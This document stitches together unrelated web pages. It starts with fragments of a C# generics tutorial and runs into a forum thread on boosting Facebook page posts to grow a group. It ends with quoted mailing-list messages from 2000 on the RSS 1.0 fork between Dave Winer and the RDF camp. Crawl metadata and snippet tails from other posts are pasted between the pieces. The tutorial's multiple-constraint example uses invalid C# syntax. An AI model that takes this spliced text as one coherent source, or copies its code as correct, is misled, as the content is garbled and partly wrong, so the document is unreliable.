list.Add(1); list.Add(33); // The next statement will fail and wont compile list.Add("Emp");
If we want our
MyCustomList to store strings, it can be done as follows:
MyCustomList<string> list = new MyCustomList<string>();
We can have multiple types in our base template class. Just separate each type with a comma in between the angular brackets.
public class MySecondCustomList<myType,mySecondType> {...}
So far so good.
Now, we will look at applying constraints by which we can restrict what types are allowed. For e.g., if we want to restrict our type to only the types implementing
IDisposable interface, we can do it as follows:
public class MyCustomList<myType> where myType : IDisposable { ... }
If there are more than one constraints, we can separate it by commas. E.g.:
public class MyDictionary<KeyType, ValType> where KeyType : IComparable, KeyType : IEnumerable
Generics are not limited to classes. They can also be used in structures, interfaces, and delegates. We can even use generics to parameterize a method by type. E.g.:
public myType MyGenericFunction<myType>(myType item) { ........ return item; }
In general, Generics allow programmers to author, test, and deploy code once, and then reuse that code for a variety of different data types. In addition, generics are checked at compile-time. When your program instantiates a generic class with a supplied type parameter, the type parameter can only be of the type your program specified in the class definition.
Version 1.0
General
News
Question
Answer
Joke
Rant
Admin | http://www.codeproject.com/KB/cs/gencsharp.aspx | crawl-002 | refinedweb | 482 | 56.35 |
The fastest way is to use Facebook Page promotion feature, which allows you to target followers from a given demographic location and more options like age group, sex, etc etc.
Not creating an ad, I mean the Facebook Page promotion feature...
When on your Facebook page, click 'Pomote' at the bottom of the menu on the left of the screen, the select promote your page. This is just one of the several methods to promote your page for more followers
But doesn't that cause Facebook to create ads and display them to the specified audience? (Sorry, that's what I meant by creating an ad).
You also need to be careful as text can only cover a certain percentage of your ad or it will be rejected. I did use them when I had a free coupon but can't honestly say that it made a significant difference. I think you would have to have a sustained campaign which will cost.
I just let my Facebook page grow organically though shares etc. That way, you get more people signing up who are genuinely interested in the topic and less people unfollowing/unliking.
Yes it's basically creating an ad promoting your group through a Facebook page. That means you need to create a Facebook Page for your group since you cannot directly promote a Facebook Group to get new relevant followers.
You need to very careful how you use facebook ads (they are rarely called ads for one thing). If you are going to boost a post or whatever, refine the target demographic very precisely.
If you don't, you will get thousands of fake likes overnight and maybe never recover from it.
Fake accounts will 'like' your page for free to cover their tracks when they 'like' pages for money.
You end up with money spent for no return (no real interaction) and a lot of obviously worthless 'likes' which will make your page look spammy.
The minimum cost for a campaign is €100 (about $110 or £90), so I won't be gambling on Facebook ads.
I've been able to do ads for much less than that. I've only tried it twice and both times, it cost me around $20 (Australian). It's just a matter of defining your audience more tightly.
Where did you read that Eubug? My posts regularly come up with offers to boost for £8, £10 or £14.
Actually looking at it again, this limit is a minimum upper spending limit before ads cease.
I've just realised you have a Group, not a Page, right? The advice you've been getting in this thread relates to a Facebook Page, not a Group. Currently there is no way to create a Facebook promotion for a Group.
I assume what you're doing is trying to create an ad through Facebook Business, which is intended for people to promote (obviously) their business. That's massively more expensive.
What you need to do is create a Facebook Page for your website. You don't have to do much with it, but you do need to create a post which links to your Facebook Group. Then you can do a promotion of that post from your Facebook page.
The key to keeping the cost down is to identify your audience. For instance, I have a bellydance website and a Facebook page for that site. The website earns income from eBay affiliate ads - so when I choose Location for my promotion, I choose only those countries where eBay operates. I do get foreign visitors, but for some sites, it might make more sense to choose English-speaking countries only. Next - there are male bellydancers, and there are young bellydancers, but the majority of bellydance enthusiasts are mature women. So I choose an age range appropriately.
Are you getting the picture? You could cast your net wide, but it will cost you more - so aim for the easy targets to keep your costs down.
I actually have both in addition to my personal Facebook account.
I have a Facebook page for the last few years and have been trying to promote it using all the usual methods (made for Pinterest images, targeted DMs on Twitter, signatures on forums etc). The Facebook page also has a pinned post promoting the new group.
The Facebook page is for DIY and gardening, it doesn't link to a specific website, but there are lots of links back here. In addition and not to go overboard on self promotion, I have links to other sites, plus I post tips and photos to keep readers interested. The Facebook group is intended to be a forum for discussing tools. I could probably ask on other forums whether I could promote the group. Some moderators seem to be lenient. Once the number of members reaches a critical level, the membership seems to snowball as members invite other members. (A gardening group I joined a month ago has seen its membership double from 10,000 to over 20,000. I don't know whether they advertise).
I didn't say you weren't allowed to promote a Facebook Group. I'm saying that feature isn't available on Facebook - it's impossible.
If you already have a post pinned on your Facebook page, then here's what you do:
1. Go to that post on your Page and click "Boost Post".
2. On the left hand side of the box that comes up, you'll see "People you choose through targeting". Click "Edit".
3. You'll see you can select gender, age, and locations. Do that. Aim ONLY at the people who are MOST likely to be interested. Don't be tempted to cast your net wide, it's wasting money.
4. Add some keywords in the Demographics box. As you type, you'll see options come up - you need to select from them. Again, use your best keywords ONLY. For instance, I'm targeting people interested in bellydancing. So I choose "bellydance" and "raqs sharqi". I don't choose "dance", because that's too general and will waste my advertising dollars.
5. Now you'll be directed back to the main menu and you can choose the duration of your ad campaign. If it's too expensive, go back and edit your choices to make them more specific.
I just did a trial run on my Page and it quoted me $2 a day.
I've done this a couple of times at weekends (when my audience is most active), but just boosted individual posts. I'll try posting again but this time boost the page itself and the post referencing the new group.
So when you did it before, did you boost the specific post that advertised the group?
Just curious - if the Facebook Page doesn't link to your website or blog, what's the point?
the initial spending may be huge but returns will be for ever if done perfectly
Any more inspiration? A few groups have been sort of ok with me posting links, but I don't want to push my luck. The Write Life10 days ago
Building a Facebook interest/community page with the idea of building as base of followers to deliver content. If you have any worthy articles in the realm of 90's music, drop me a link that I can save. When I get Eugene Brennan2 months ago
What's the best way of doing this? Tweeting doesn't seem to work. DMing all of them would be cool, but bad etiquette and could potentially lead to a banning. rachel carpenter2 years ago
Can we put our Hubs on PAID ads on FB, etc? Yes, I do realize the cost of the ads is more than the how much we get per click. I'm sure I sound crazy.But, seriously, is. | https://hubpages.com/community/forum/142148/whats-the-best-way-of-promoting-a-facebook-group | CC-MAIN-2017-39 | refinedweb | 1,319 | 72.87 |
Difference between revisions of "Jetson/Tutorials/Vision-controlled GPIO"
Revision as of 09:21, 9 January 2015
Contents
Turn an LED on/off based on whether a face is detected by a camera
This tutorial will explain how to detect a face using OpenCV, and how to turn an LED on/off based on whether the face is detected.
Testing your camera
- Connect a USB webcam to the full-sized USB 3.0 port on Jetson TK1 (or into the micro-AB USB 2.0 port through a micro-B to female USB-A adapter).
- If you haven't tried using your webcam on Jetson TK1, check if it works first such as by running this to show the camera preview in a graphical window:
sudo apt-get install luvcview luvcview
(If you can't see the camera stream, then try plugging your webcam into the micro-AB USB 2.0 port through a micro-B to female USB-A adapter, or looking at supported cameras on the Cameras reference page).
- Not all working webcams seem to be supported by openCV, example programs stall with: Corrupt JPEG data: 4 extraneous bytes before marker 0xd9
- Sony PS3 eyecam wfm
Detecting a face using OpenCV
- If you haven't done so already, make sure you have installed the CUDA toolkit and the OpenCV development packages on your device, by following the CUDA tutorial and the OpenCV tutorial.
- Download the OpenCV samples (they come).
- Make your own "faceActivatedGPIO" folder for this project, eg:
mkdir ~/faceActivatedGPIO cd ~/faceActivatedGPIO
- Copy the "cascadeclassifier" face detection sample from OpenCV's GPU-accelerated samples folder and build it:
cp ~/opencv/samples/gpu/cascadeclassifier.cpp . g++ cascadeclassifier cascadeclassifier
- Try running it with your attached webcam:
./cascadeclassifier --cascade ~/opencv-2.4.9/data/haarcascades/haarcascade_frontalface_alt.xml --camera 0
(Hit 'm' to search for just a single face instead of multiple faces, then hit Spacebar if you want to compare CPU vs GPU performance).
In case of difficulty try Testing openCV.
Testing GPIO on Jetson TK1
- If you haven't done so already, follow the GPIO tutorial so that you can manually turn an LED on/off using root-permissions.
- We want to control GPIO from our own code. Download Derek Molloy's SimpleGPIO library and get the 3 source files in the "gpio" folder. eg:
sudo apt-get install git git clone git://github.com/derekmolloy/boneDeviceTree/ mkdir gpio cp ../boneDeviceTree/gpio/*.cpp gpio/. cp ../boneDeviceTree/gpio/*.h gpio/.
- Let's build & run the sample TestApplication to make sure GPIO works. Remember that it must be run with root-permissions in order to access GPIO:
g++ gpio/TestApplication.cpp gpio/SimpleGPIO.cpp -I gpio -o testGPIO sudo ./testGPIO
- You should now be seeing your LED flash several times (or see the voltage going up & down on your multimeter).
Controlling the LED based on face detection results
- Rename "cascadeclassifier.cpp" to "faceActivatedGPIO.cpp", eg:
mv cascadeclassifier.cpp faceActivatedGPIO.cpp
- Now it is just a matter of combining the cascadeclassifier sample code with the SimpleGPIO library. Near the top of the "faceActivatedGPIO.cpp" file, add:
#include "SimpleGPIO.h"
- Then near the bottom of the file after it says imshow("result", frameDisp); (line 277), add this code:
// Turn the LED on or off depending on whether a face was detected or not. const int GPIO_LED = 57; // GPIO_PH1 (Pin 50 on J3A1 of Jetson TK1 board) gpio_export(GPIO_LED); // Start using the LED pin gpio_set_dir(GPIO_LED, OUTPUT_PIN); // The LED is an output if (detections_num > 0) { gpio_set_value(GPIO_LED, HIGH); // Turn the LED on } else { gpio_set_value(GPIO_LED, LOW); // Turn the LED off } gpio_unexport(GPIO_LED); // Stop using the LED pin for now
- Build the project. eg:
g++ faceActivatedGPIO.cpp gpio/SimpleGPIO.cpp -I gpio -o faceActivatedGPIO
- And finally, run the project with root-permissions. eg:
sudo ./faceActivatedGPIO
You should now see your camera preview on your screen, and if your face is detected then your LED should be on, and if not then it should be off!
More ideas
You can improve this project in many ways, such as turning on an electro-mechanical relay that opens a door when a face is detected, instead of just flashing an LED. Or turn multiple LEDs on based on how many faces were detected or their size, by using multiple GPIO pins. And obviously, now that you know how to perform some vision-based GPIO, you could apply the same principles to activate GPIO when the full-body of a person is detected (using OpenCV's HOG sample as explained in the Full Body Detection tutorial) or when a car is detected (using the same HOG or CascadeClassifier code but with an XML file trained for car classification), or thousands of other potential computer vision or software based detections.
This tutorial is also the basis for the vision-controlled robot tutorials such as the SCOL walking robot tutorial. | https://elinux.org/index.php?title=Jetson/Tutorials/Vision-controlled_GPIO&diff=prev&oldid=368066&printable=yes | CC-MAIN-2021-04 | refinedweb | 808 | 51.28 |
Developing Flash applications is really easy with Haxe. Let's look at our first code sample. This is a basic example showing most of the toolchain.
Create a new folder and save this class as
Main.hx.
import flash.Lib; import flash.display.Shape; class Main { static function main() { var stage = Lib.current.stage; // create a center aligned rounded gray square var shape = new Shape(); shape.graphics.beginFill(0x333333); shape.graphics.drawRoundRect(0, 0, 100, 100, 10); shape.x = (stage.stageWidth - 100) / 2; shape.y = (stage.stageHeight - 100) / 2; stage.addChild(shape); } }
To compile this, either run the following from the command line:
haxe -swf main-flash.swf -main Main -swf-version 15 -swf-header 960:640:60:f68712
Another possibility is to create and run (double-click) a file called
compile.hxml. In this example the hxml file should be in the same directory as the example class.
-swf main-flash.swf -main Main -swf-version 15 -swf-header 960:640:60:f68712
The output will be a main-flash.swf with size 960x640 pixels at 60 FPS with an orange background color and a gray square in the center.
Run the SWF standalone using the Standalone Debugger FlashPlayer.
To display the output in a browser using the Flash plugin, create an HTML-document called
index.html and open it.
<!DOCTYPE html> <html> <body> <embed src="main-flash.swf" width="960" height="640"> </body> </html> | https://haxe.org/manual/target-flash-getting-started.html | CC-MAIN-2018-17 | refinedweb | 236 | 70.19 |
Porting, Creating and Running Cocos2d-x 3.0 Apps on Google Glass¶
Contributed By: jeffxtang
This tutorial first shows you how to port and run the Cocos2d-x 3.0 CppTest demo on Google Glass, and illustrates how to create and run a new Cocos2d-x 3.0 app on Glass.
Porting and Running the Cocos2d-x 3.0 Demo App on Google Glass¶
Below are the steps to run the sample C++ demo app that comes with the Cocos2d-x 3.0 on Mac:
1. Download and unzip the Android SDK (ADT bundle) at (Google Glass is based on Android);
2. Launch the Eclipse from the ADT bundle’s eclipse directory, then open Window > Android SDK Manager, install SDK Platform and Glass Development Kit Preview under Android 4.4.2 (API 19);
3. Connect your Google Glass and open Terminal, run <path-adt-bundle>/sdk/platform-tools/adb devices to verify that your Glass shows, or follow the Glass GDK Quick Start at;
4. Follow the how-to guide at to get the sample app cpp-tests built (note – you may need to run brew update before brew install ant). You can skip the section “How to deploy it on your Android phone via command line” in the guide above as we’ll import the project to Eclipse and install the app to Glass from Eclipse, but you may also want to test it on your other non-Glass Android device first to get the feeling how the demo runs.
5. Follow steps at to import the cpp-tests project and the libcocos2dx project to Eclipse.
6. Select the CppTests and Run it As Android Application with your Glass connected and turned on.
Unfortunately, tap or swipe left or right won’t navigation the demo menu. And what makes it worse is if your Glass screen goes off, tap on it again would you take to the “ok glass” home screen instead of this CppTests app. You can install the Launchy app () and use it to easily select the CppTests to run if the Glass goes off.
7. To enable user interaction for the CppTests on Glass, you need to first modify the class implementation in AppActivity.java file as shown in Listing 1.
// Listing 1. Enable and Pass Touch Event to Cocos2dx View on Glass public class AppActivity extends Cocos2dxActivity { Cocos2dxGLSurfaceView glSurfaceView; public Cocos2dxGLSurfaceView onCreateView() { glSurfaceView = new Cocos2dxGLSurfaceView(this); glSurfaceView.setEGLConfigChooser(5, 6, 5, 0, 16, 8); return glSurfaceView; } public boolean onGenericMotionEvent(MotionEvent event) { if ((event.getAction() & MotionEvent.ACTION_MASK) == MotionEvent.ACTION_POINTER_DOWN) { finish(); return true; } glSurfaceView.onTouchEvent(event); return false; } }
The changes are to make glSurfaceView, the view that shows each demo feature, an instance variable so in the GenericMotionEvent we can pass the touch event (except the double finger tap, which will finish the app) to the glSurfaceView.
8. To develop C++ code directly from Eclipse, we need to link the C++ source files in Classes directory to the CppTests’ Classes folder in Eclipse. To do this, open the project Properties, select C/C++ General, then Paths and Symbols, you’ll see a message “This project is not a CDT project” (CDT stands for C/C++ Development Tools).
To fix this, click Cancel in the Properties window. In Eclipse, select File ä New ä Project…, then select C/C++ ä C++ Project, enter a dummy project name and hit Finish. Now open the dummy project’s Properties ä Resource to find its location. On Terminal, copy the .cproject file from that location to your new game app’s proj.android directory (<path-to-cocos2d-x-3.0>/tests/cpp-tests/proj.android). You can delete the dummy project from both Eclipse and project contents on disk now.
9. Go back to CppTests Properties ä C/C++ General ä Paths and Symbols ä Source Location, click Link Folder..., check Link to folder in the file system, then Browse… and select the Classes folder of CppTests. Click OK twice, Eclipse will show all the source folders under Classes.
10. Next, we need to modify the AppDelegate.cpp file in the Classes folder. But as soon as you open the file, you’ll see lots of errors and you can’t build and install the CppTests on Glass anymore! This is because Eclipse, at least as of the ADT version 22.6.2, incorrectly shows the error in the CppTest project and lots of errors in the AppDelegate.cpp file.
To fix this, open the CppTests’s Properties window, then go to Code Analysis under C/C++ General, select Use project settings, and deselect Syntax and Semantic Errors – click OK and you’ll see errors are gone. This is important as otherwise you won’t be able to build the CppTests app from Eclipse after we make some C++ code change in Eclipse.
11. The changes we need to make to AppDelegate.cpp is pretty simple – inside the applicationDidFinishLaunching method, before return true; add the following two lines of code:
Then add #include "Box2DTestBed/Box2dView.h" in the beginning of AppDelegate.cpp. Now open a Terminal window, cd the cocos2d-x-3.0’s build directory, run the native C++ library build command:
python android-build.py -p 19 cpp-tests
After the “BUILD SUCCESSFUL” message, a new version of the CppTests library file, named libcpp_tests.so, will be available in the CppTests > libs > armeabi folder.
12. Now run the CppTests app again from Eclipse, you’ll see the CppTests’s Box2D sample running on Glass, and move your finger on the Glass touchpad you can see the box moved on Glass.
Ideally, we should be able to use gesture to go back to MainMenu and easily test all the other cool features of Cocos2d-x on Glass. It may quite likely come true by the time you read the book – if so, we’ll post the link to the updated tutorial on the book’s site. For now, you can use steps 11 and 12 above to experiment with all the other features demonstratred in the CppTests. For example, to check out how the ParticleTest runs on Glass, replace auto s = new Box2dTestBedScene(); with auto s = new ParticleTestScene(); in AppDelegate.cpp, add #include "ParticleTest/ParticleTest.h", build the C++ library, and run the CppTests app from Eclipse
After playing with CppTests, you should check out the Cocos2d-x Wiki and API References at for further info, before you start using it to build your next Glass game.
Now that you know how to run the demo CppTests on Glass, let’s see how you can create a new Cocos2d-x app running on Glass.
Creating a New Cocos2d-x App on Glass¶
Follow the steps below to create a Cocos2d-x app from scratch:
1. Follow the how-to guide at. To summarize, the commands I ran on my Mac are:
cd cocos2d-x-3.0 ./setup.py source ~/.bash_profile cocos new MyGame -p com.myCompany.myGame -l cpp -d ./MyCompany cocos run -s ./MyCompany/MyGame -p android
If you use Windows or Linux, you can use similar commands.
2. In Eclipse, import the Android project located at MyCompany/MyGame/proj.android. After importing, if you see errors on the MyGame project and the AppActivity.java, you need to fix the reference to the libcocos2dx: open the project’s Properties, go to Android’s Library section, click Add… and then select the libcocos2dx there.
3. Run the MyGame app on your Glass and you’ll see the Cocos2d-x version of Hello World on Glass.
4. If you click the Classes folder, which should contain all the C++ code for the game app, you’ll see it’s empty, but it’s located at MyCompany/MyGame, at the same level as the proj.android directory. We need to link the Classes directory to the MyGame’s Classes folder in Eclipse, as we did for the CppTests demo, in step 8 of the last section – in Eclipse, select File > New > Project…, then select C/C++ > C++ Project, enter a dummy project name and hit Finish. Now open the dummy project’s Properties ä Resource to find its location. On Terminal, copy the .cproject file from that location to your new game app’s proj.android directory (MyCompany/MyGame/proj.android).
Now go back to MyGame’s Properties ä C/C++ General ä Paths and Symbols ä Source Location, click Link Folder..., check Link to folder in the file system, then Browse… and select the Classes folder of MyGame, click OK.
5. If and only if you open AppDelegate.cpp file in Classes, you’ll see lots of errors. To fix this, follow Step 10 in the last section.
6. Now open AppActivity.java and make its content to be like Listing 1. Then open HelloWorldScene.cpp, add the following code, most of which borrowed from, but with some fixes, to the end of the HelloWorld::init() method, before return true; as shown in Listing 2.
That's all the code change you need to make.
7. Open a Terminal window, cd MyGame’s proj.android directoty, run the “python build_native.py” command, you should see messages as follows:
[armeabi] Compile++ thumb: cocos2dcpp_shared <= HelloWorldScene.cpp [armeabi] SharedLibrary : libcocos2dcpp.so [armeabi] Install : libcocos2dcpp.so => libs/armeabi/libcocos2dcpp.so
We're all set.
8. Back to Eclipse, run the MyGame app on Glass. This time, you can move around the image on the top on the Glass touchpad.
If you have any Cocos2d game development background, or even if you don’t, you can come up to speed with Cocos2d-x quickly – it has well documented online resources and examples. What I hope to offer here is to show you how to run the engine and samples on Google Glass and interact with the engine, so you can see the possibility and potential of using the great engine for your next Glass game project – to get inspired, take another look at many great games developed with the engine at. | http://cocos2d-x.org/wiki/User_Tutorial-Porting_Creating_and_Running_on_Google_Glass | CC-MAIN-2017-30 | refinedweb | 1,665 | 72.05 |
Ive created a console program that works. The program launches and asks for the user to input values for the player class.
Then I initialize a list of Monster classes and have values entered into the method to create each monster. But I am receiving an error after the program runs claiming the index value may be overloaded. w/e that means.
List<Monster> monsterlist = new List<Monster>(); monsterlist[0].CreateMonster("Goblin", 4, 4, 4, 1); monsterlist[1].CreateMonster("Wolf", 2, 2, 2, 1);
This is my list and the values used. I run it and then...
"ArgumentOutOfRangeException was handled
Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index"
pops up highlighting the line..
monsterlist[0].CreateMonster("Goblin", 4, 4, 4, 1); -- Thats the problem. I have no idea what im doing wrong even after reading the help files. I will conclude with the code of the Monster class. Thanks for the help!
public class Monster { private string Name = "Monstername"; private int Damage = 1; private int Delay = 1; private int Atk = 1; private int Treasure = 0; public Monster() { } public void CreateMonster(string name, int damage, int delay, int atk, int treasure) { SetName(name); this.Damage = damage; this.Delay = delay; this.Atk = atk; this.Treasure = treasure; } public void SetName(string n) { this.Name = n; } }
the files are in the same namespace. | https://www.daniweb.com/programming/software-development/threads/209986/list-exemption-issue-with-index | CC-MAIN-2018-43 | refinedweb | 231 | 70.29 |
23 November 2011 21:47 [Source: ICIS news]
(updates with Canadian and Mexican chemical railcar traffic data)
TORONTO (ICIS)--Chemical shipments on Canadian railroads rose 2.3% year on year in the week ended on 19 November, rebounding after two declines in a row, according to data released by an industry association on Wednesday.
Canadian chemical railcar loadings for the week totalled 10,458, up from 10,225 in the same week a year earlier, the Association of American Railroads (AAR) said.
The previous week ended 12 November saw a year-on-year decline of 8.0% in Canadian chemical railcar shipments, marking the fifth decline so far this year.
The weekly chemical railcar loadings data are seen as an important real-time measure of chemical industry activity and demand. ?xml:namespace>
Year to date to 19 November, Canadian chemical railcar shipments were up by 9.2% to 511,901.
The AAR said chemical railcar traffic in
Year to date to 19 November, Mexican chemical railcar shipments were up by 6.6% to 54,144.US chemical railcar traffic rose 1.4% year on year for the week ended 19 November, rebounding from a decline in the previous week
There were 28,928 chemical railcar loadings last week, compared with 28,528 in the same week in 2010.
In the previous week, ended 12 November, US weekly chemical railcar traffic fell by 2.1% year on year, marking its fourth decline so far this year.
Meanwhile, overall US weekly railcar traffic for the 19 high-volume freight commodity groups tracked by the AAR rose by rose by 1.1% year on year, to 301,919 carloads. | http://www.icis.com/Articles/2011/11/23/9511071/canada-weekly-chemical-railcar-traffic-rises-2.3.html | CC-MAIN-2014-52 | refinedweb | 276 | 55.34 |
This. So this is very much an
outsider’s history, and like any history, it is necessarily biased, selective, and incomplete.
6/28/2000. Eric van der Vlist: Will RSS fork?
Following a thread on the syndication mailing list, Rael Dornfest has announced an “RSS Modularization Spec(ish) page” defining how RSS could be extended using namespace based modules.
7/5/2000. Leigh Dodds: RSS Modularization
Perhaps the key benefit of RSS is its simplicity. The syntax for the format is easy to understand, and there are only a few self-explanatory tags to learn. This makes RSS files relatively trivial to produce. Dave Winer of Userland has recently added some new online documentation for RSS 0.91, adding historical notes as well as capturing details of its common usage patterns.
Developers on the RSS and Syndication mailing lists are now discussing future directions for RSS, the hope being to build on current successes and provide richer functionality.
8/14/2000. Rael Dornfest: RSS.
Interested parties are invited to join a working group on the newly-created RSS-DEV mailing list at:
8/16/2000. Aaron Swartz: Re: Thoughts, questions, and issues
[addressing Dave Winer] If I understand you correctly, you want to create a set of elements for RSS that are widely supported and you’re free to do that. Just create your own namespace and tie it into the proposal. You say namespaces are confusing, but I have to disagree with you there. When used properly, they can actually make XML easier to understand.
… RSS is now (or once again) an RDF format, which has its benefits and drawbacks. It does make RSS more complicated, which is a downside. However, as R.V. Guha pointed out to me, you can easily escape from RDF if you don’t like it by using the rdf:parseType=”literal” attribute. Again, I think this is likely a best-of-both-worlds move.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #2
So, Aaron, because we disagree you get to make the rules?
So sad it comes to this. If you’d stop and think you’d realize there’s a win-win here, all it takes is a little listening and considering other points of view.
So sad, because there will be two RSS 1.0s.
So confusing, so embarassing.
(And a waste of time!)
See you in the market.
8/16/2000. Paulo Gasper: Re: Thoughts, questions, and issues #2b
Hi Dave,
Your statement (above) works both ways.
IMHO, Aaron even gave an example to illustrate why he thinks that way. It seems to me that he is trying to reason over that. Not forcing.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #2c
Paulo, the force comes from the choice of the RSS 1.0 name. Doesn’t leave much wiggle room.
8/16/2000. Dave Winer: Re: Thoughts, questions, and issues #3. (Note: here Dave is not replying to Aaron’s messages quoted above, but to someone else entirely.)
That’s fine. But I’m going to keep going. I’m tired of debating this stuff. I’ve been having a lot of fun in the last couple of months, and it’s only been in the last few days that it started to turn into the usual hand-wringing, trying to keep you from hearing things that apall you. Enough is enough. These guys want to own RSS. I put a ton of work into it. Somehow reconcile that with your appalled-ness. This is not a nice thing that’s going on. I’m apalled.
8/16/2000. Paul Freeman: The RDF approach needs to answer some valid criticism
- To enable the average developer to cope, a syndication format must be simple to create and be easily read by a human. The rdf approach requires too much studying and background knowledge to easily pick up and is too hard for humans to read and create manually.
- RSS should also be easy to parse and create using any software environment which developers care to use. Some software environments are too weak to handle RDF and the namespace syntax.
… If the RDF approach is to be widely accepted and adopted then 1) and 2) require solutions. Not all of them may be technical, but better software tools support is part of a solution which does not require the simple syntax required by the “expanded core”. This software tools support should span *all* of the environments which people need to use… and we shouldn’t sneer at people who try to parse this stuff in Perl, VB or even, shock horror, Macromedia Flash.
8/17/2000. Paulo Gasper: Re: Thoughts, questions, and issues #4
That seems to be the main problem: RDF focus.
RSS became a popular format with people that couldn’t care less about RDF. The value of RSS is that popularity.
There are a lot of private little “RSS processors” and this [proposed RSS 1.0] standard does not care much about them.
8/20/2000. Aaron Swartz: Re: Thoughts, questions, and issues #5
I think the answer from the RSS-DEV people (I’m sort of guessing, correct me if I’m wrong) is that the writers shouldn’t have to understand the spec – they should be able to use tools that will generate the RSS for them.
… The fact is, as far as I’m concerned, nobody but the programmers should have to deal with these specs. There seems to be a lot of confusion here, that RSS files are meant to be written by hand. Perhaps that was true with the old spec, but it doesn’t need to be, and is even less true with the new one. The specs are written for programmers, to allow them to write programs that communicate.
… so that you don’t have to generate the RSS file by hand, you can convert to it or do it through a web interface. If you still have trouble, let us know, we’re here to help, not to scare.
8/20/2000. Lynn Siprelle: Re: Thoughts, questions, and issues #6
[addressing Aaron] I have nothing but respect for you, *believe* me, but this is just a little too close to “don’t worry your purty li’l head about it, missy.”
OK, fine, so I can find some tool somewhere to generate the RSS file for me. But what if I want to parse one, which I will? I *still* have to understand the spec, and I don’t. And I’m neither stupid nor technically illiterate.
… It’s not just the simple writers you’ll need to worry about. It’s the simple webmasters who are doing things with RSS files now and who will get tripped up by these changes. If you’ve ever done tech support (and I have) you know that there are all kinds of people out there doing this stuff–brilliant kids like Aaron and old duffers who just wanna put up photos of the grandkids, and everyone in between.
8/20/2000. Aaron Swartz: Re: Thoughts, questions, and issues #7
[addressing Lynn] Oh, I definitely know what you mean. But here’s how I see it:
Writers:
- Use an automated RSS creator
- Use a web-based RSS creator with a nice interface
- Use a converter from the simple format to the more complex
Readers:
- Use a pre-built RSS parser (like XML::RSS for Perl)
- Use a down-converter to a simpler format
- Ignore the new additions and just use the old stuff
8/21/2000. zac: Re: Thoughts, questions, and issues #8
[addressing Aaron] These sorts of assumptions are self fulfilling to a degree. If you write a spec assuming that some users won’t interact with it then they won’t.
This limits the number of people that will use the format.
People want to (and should) understand the technologies that they use. So when you build a format that puts required namespace declarations in the <channel> tag then I think you’ve gone down a path that isn’t going to be followed by as many people.
8/21/2000. Aaron Swartz: Re: Thoughts, questions, and issues #9
I maintain that the new [proposed RSS 1.0] spec is for more technical usage than the older one. For real heavy-duty use, it will require some understanding of XML and RDF. The benefit from this is more power, but at the expense of some clarity and simplicity. I see RSS as moving away from a simple XML language for the people, and more towards a communication system for content management systems and other scripting environments. It may not be the choice you believe in, but it’s a choice that the authors are making. There will always be other formats if you don’t agree.
8/24/2000. Dan Libby: RSS: Introducing Myself
I was the primary author of the RSS 0.9 and 0.91 spec and the architect behind the My Netscape Network. … I was the primary author of the RSS 0.9 and 0.91 spec and the architect behind the My Netscape Network (a separate project from My Netscape, which I also worked on). I left Netscape in 1999, in part because of what I felt was mis-handling (non-handling?) of RSS and the MN platform. I fully expected the format to die an ignominious death, and I was pleasantly surprised to recently to poke my head out of the sand and find so many people still using it. I am glad that the net community has begun adopting RSS, and would like to see it realize the original vision.
The original My Netscape Network Vision:
We would create a platform and an RDF vocabulary for syndicating metadata about websites and aggregating them on My Netscape and ultimately in the web browser. Because we only retrieved metadata, the website authors would still receive user’s click-throughs to view the full site, thus benefitting both the aggregator and the publisher. My Netscape would run an RDF database that stored all the content. Preferences akin to mail filters, would allow the user to filter only the data in which they are interested onto the page, from the entire pool of data. For example, a user interested in articles about “Football” would be able to setup a personalized channel that simply consisted of a filter for Football, or even for a particular team or player. Or for all references to Slashdot.org, or whatever. This fit our personalization scheme well, and would (I hoped) give us the largest selection of content, with the greatest degree of personalization available. Tools would be made available to simplify the process of creating these files, and to validate them, and life would be good.
What Actually Happened:
- A decision was made that for the first implementation, we did not actually need a “real” RDF database, which did not even really exist at the time. Instead we could put the data in our existing store, and instead display data, one “channel” at a time. This made publishers happier anyway, because they would get their own window and logo. We could always do the “full” implementation later.
- The original RDF/RSS spec was deemed “too complex” for the “average user”. The RDF data model itself is complex to the uninitiated, and thus the placement of certain XML elements representing arc types seemed redundant and arbitrary to some. Support for XML namespaces was basically non-existent. My (poor) solution was to create a simpler format, RSS 0.9, that was technically valid RDF, but dropped namespaces and created a non-connected graph. … This marked the beginning of the Full Functionality vs Keep It Simple Stupid debate that continues to this day. …
- We shipped the first implementation, sans tools. Basically, there was a spec for RSS 0.9, some samples, and a web-based validation tool. No further support was given for a while…
- At some point, it was decided that we needed to rev the RSS spec to allow things like per item descriptions, i18n support, ratings, and image widths and height. Due to artificial (in my view) time constraints, it was again decided to continue with the current storage solution, and I realized that we were *never* going to get around to the rest of the project as originally conceived. At the time, the primary users of RSS (Dave Winer the most vocal among them) were asking why it needed to be so complex and why it didn’t have support for various features, eg update frequencies. We really had no good answer, given that we weren’t using RDF for any useful purpose. …
- We shipped the thing in a very short time, meeting the time constraints, then spent a month or two fixing it all. :-) …
- People on the net began creating all sorts of tools on their own, and publishing how-to articles, and all sorts of things, and using it in ways not envisioned by, err, some. And now we are here, debating it all over again.
8/25/2000. O’Reilly Network: Open Source Roundtable: Radio show on RSS 1.0
O’Reilly Network publisher Dale Dougherty talks with some of the core developers behind the new spec for RDF Site Summary (RSS 1.0) about the background behind RDF, the need for a standard, and what RSS enables. (downloadable as MP3 (10MB), or as RealAudio stream)
8/26/2000. Dave Winer: Comments on O’Reilly radio show on “RSS 1.0″
The format and process they describe are highly complex. They are over-estimating content people’s technical sophistication and interest in working on new formats.
IMHO, the new format should not be called RSS. There’s been a fork, and the peaceful solution is to each go our own way. Calling their spec RSS is unfair. We never considered moving RSS forward without getting O’Reilly on board first. RSS 1.0 was a surprise, we found out when the spec went public. I’ve said this over and over to the O’Reilly people, I would wish them godspeed if they hadn’t called it RSS. Should we call our spec RSS 1.0 too?
BTW, it was Netscape’s decision to take the RDF out of RSS, one we heartily supported. We considered calling it Really Simple Syndication. That’s the core thing about RSS, simplicity, it’s almost an end-user format, easily explained in a four-screen spec designed for people who understand HTML and not much more. Once Guha left, Netscape totally dropped the RDF pretense. Now it’s back.
8/26/2000. Aaron Swartz: Re: Commentary: RSS Roundtable
[re: complexity] Once again, content people can use the tools that we’re creating to convert from simpler formats and write files through a Web interface.
